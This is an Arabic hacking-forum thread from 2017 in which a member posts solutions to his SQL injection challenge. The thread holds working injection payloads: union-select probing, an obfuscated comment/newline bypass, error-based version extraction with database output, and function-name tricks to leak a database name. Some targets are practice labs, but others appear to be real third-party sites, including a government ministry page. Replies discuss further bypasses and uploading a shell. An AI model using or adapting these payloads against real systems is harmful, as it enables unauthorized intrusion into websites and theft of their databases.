TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 09-08-2017, 12:21 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي حل التحدي الثٌلاثي السابق لي



السلام عليكم ورحمة الله

كنت وضعت عدة مواقع كاتحدي للحقن بهذا الموضوع

كود PHP:
http://www.sec4ever.com/home/showthread.php?t=18724 
فإليكم الحل بصورة سريعه لضيق الوقت لدي


الموقع الأول

عدد الأعمده عشرة

كود:
sinnenashus.se/?id=5 union select 1,2,3,4,5,6,7,8,9,10

لكن ظهر الخطأ

كود:
Fatal error: Maximum execution time of 30 seconds exceeded

لذا الحل سوف يكون التالي والمناسب لتخطي هذا الخطأ

إسم التقنية

تقنية التحكم في التدفق الـ Flow Control

كود:
هذه التقنية من إختراعي ليست لأحد في الدنيا غيري



لنقوم أولا بالتقديم لهذه التقنيه

التقنية الرئيسية

المطلوب لتنفيذ التقنية

هي للمواقع التي تٌعاني فقد في قيم الأعمدة

مثال كٌلي على تركيب التقنية



كود:
www.InjectorBoy.md/news.php?id=.58||!{f`id`}union-- a%[email protected],2,3,4-- -




شرح أٌلأٌسلوب التركيبي



[1] || means "or" .
[2] ! means not() .
[3] {f} means timestamp .
[4] `id` is the column .
[5] --%0a means comment and new line .
[6] the @ after is just to stick a char to select, @ is a temporary variable .


بالعربيه


[1]

|| تعني "أو" .


[2]

! تعني لا() .


[3]

{f} تعني الطابع الزمني .


[4]

`id` تعني العمود .


[5]

--%0a تعني تعليق و سطر جديد .


[6]

الـ @ بعد الـ select هي مٌجرد مٌتغير مؤقت ويحذف الرقم الأول للأعمدة ويٌستبدل بالـ @ .


وهذه التقنية لا تصلٌح لكافة قواعد البيانات بمعنى إنها لا تعمل إلا مع المواقع التي تٌعاني فقد في قيم الأعمدة والتي تحتاج لتعريفهٌ عند كتابة الإستغلال العام الكٌلي -


كود:
http://testphp.vulnweb.com/listproducts.php?cat=.1||!{f`id`}union-- a%[email protected],2,3,4,5,6,7,8,9,10,11-- -







بالنسبه لموقعنا الفقد هنا فقد جٌزئي في المتغير
لذا كٌل ما علينا هو تعويض هذا الفقد عن طريق إضافة قيمة تعويضيه حرفيه للمٌتغير مٌستخدمين تقنية التحكم في التدفق الـ Flow Control على النحو التالي

كود:
sinnenashus.se/?id={f -5} union select 1,2,3,4,5,6,7,8,9,10




إنتهي الشرح


الموقع الثاني

إظهار إسم قاعدة البيانات

الحل


كود PHP:
www.gov.ai/ministry.php?id=_() 
الناتج

FUNCTION govai_website_main._ does not exist


الموقع الثالث والأخير

كود PHP:
                       http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1 
عند وضع اشارة الكومة للتاكد من إصابة الموقع

كود PHP:
 http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1 ' 
ظهر الخطأ التالي

Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQLserver version for the right syntax to use near ''1 ''))a limit 1' at line 1

لنتعلم شئ معا ان دائما الحل يظهر فى الخطأ عبارة عن تنبيه من قاعدة البيانات


كود PHP:
leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1'))a UNION ((select 1 from(select count(*),concat(version(),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x))-- - 
Error While Selection process : Duplicate entry '5.6.35-cll-lve:1' for key 'group_key'

تم تخطي المشكله بعملية الاغلاق على المتغير وإستخدام الإيرورباسيد يونيون سليكت للحقن


تحياتى للجميع


 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
20 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #2  
قديم 09-08-2017, 12:52 PM
الصورة الرمزية Rover
Rover
عضو مميز
 
حـالة التــواجـد : Rover غير متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 182
شكراً:1,895
تم شكره 233 مرة في 68 مشاركة
معدل تقييم المستوى: 0
Rover بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

تحدي جميل

لكن في الموقع الاول جرب

اقتباس:
sinnenashus.se/?id=`false union select 1,2,3,4,5,6,7,8,9,10-- -
 
ولاحظ الخطأ الظاهر
هل في احتمال انو في امكانيه اكمال الحقن union based  

 

 

سبحان الله وبحمده سبحان الله العظيم
..............
They will learn the lesson in a hard expensive way

رد مع اقتباس
  #3  
قديم 09-08-2017, 02:26 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

اقتباس:
المشاركة الأصلية كتبت بواسطة Hiker مشاهدة المشاركة

تحدي جميل

لكن في الموقع الاول جرب


ولاحظ الخطأ الظاهر
هل في احتمال انو في امكانيه اكمال الحقن union based
لا عزيزي لايمكن بأي طريقة من الطرق حقنه باليونيون باسيد لان الخطأ الناتج فى الاساس

كود PHP:
The used SELECT statements have a different number of columns 
لذا الحقن error based

ملحوظة : لقد تمكنت من تخطي هذا الخطاء والحقن يونيون باسيد عادي فى بعض المرات بإستخدام التقنيتين الثانية والثالثه بالموضوع المشروح هنا

كود PHP:
http://www.sec4ever.com/home/showthread.php?t=18731 
ولكني لم أٌجرب ذلك


وشرحت ذلك فى كتابي 2016


اليك مثال


كود PHP:
www.onlinepost.in/show.php?page=-39+DiV+0+/*!00000UnIoN*/ SeLeCt 1,2,3,4,5,6,7,8,9,10,11 -- - 

Database query failed: The used SELECT statements have a different number of columns

هذا الموقع يمكن حقنه مع هذا الخطاء بأٌسلوب يسمى

routed query injection

سوف يشرح فى الدرس القادم إن شاء الله وموجود بكتبى ايضا

تحياتى
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
2 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #4  
قديم 09-08-2017, 02:36 PM
الصورة الرمزية PHILOPS
PHILOPS
عضو نشيط
 
حـالة التــواجـد : PHILOPS غير متواجد حالياً
تاريخ التسجيل: Sep 2015
الجــــنــــــس: ذكـر
المشاركات: 71
شكراً:47
تم شكره 74 مرة في 36 مشاركة
معدل تقييم المستوى: 0
PHILOPS بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

جيد، في ثغرات xpath هل يمكنني رفع shell ؟  
رد مع اقتباس
  #5  
قديم 09-08-2017, 02:39 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

اقتباس:
المشاركة الأصلية كتبت بواسطة philops مشاهدة المشاركة

جيد، في ثغرات xpath هل يمكنني رفع shell ؟
.تقصد عن طريق الحقن مباشرة

إن كنت تقصد ذلك فليس لي علم بذلك لان كل الثغرات التي تستدعى ملفات من الخارج ضمن الحقن تم ترقيعها  

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
  #6  
قديم 09-08-2017, 06:13 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: حل التحدي الثٌلاثي السابق لي

للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.  
رد مع اقتباس
2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #7  
قديم 09-08-2017, 06:18 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.
أهلا بيك عزيزي تقصد ذلك


نوع الحقن المطلوب : union based

لمن ليس لهٌ دراية هذا معناه أن الحقن سوف يكون بإستخدام الـ union select فقط لا غير


هذا منوط فقط بالموقع الاول ولم أذكرة في كلى الموقعين الاخرين أظنك عزيزي فهمت الامر بهذه الصورة المٌغايرة لما اطلب
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
2 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #8  
قديم 09-08-2017, 06:18 PM
الصورة الرمزية aircrack -ng
aircrack -ng
:: عضو خاص ::
 
حـالة التــواجـد : aircrack -ng غير متواجد حالياً
تاريخ التسجيل: Jun 2013
مكـان الإقامـة : sec4ever
الجــــنــــــس: ذكـر
المشاركات: 246
شكراً:691
تم شكره 1,698 مرة في 201 مشاركة
معدل تقييم المستوى: 0
aircrack -ng بدون تقييم
افتراضي رد: حل التحدي الثٌلاثي السابق لي

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

للإشارة انك حصرت الحقن على union based بينما الحل في الموقع الثاني والثالث بطريقة اخرى.
علي نعرفك حبيب اللغة هاذي
ارا السكايب الجديد  

 

 

يامن بدنياه انشغل وغره طول الامل الموت يأتي بغتة والقبر صندوق العمل
رد مع اقتباس

الكلمات الدلالية (Tags)
لي, التحدي, الثٌلاثي, السابق, حل


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 11:14 PM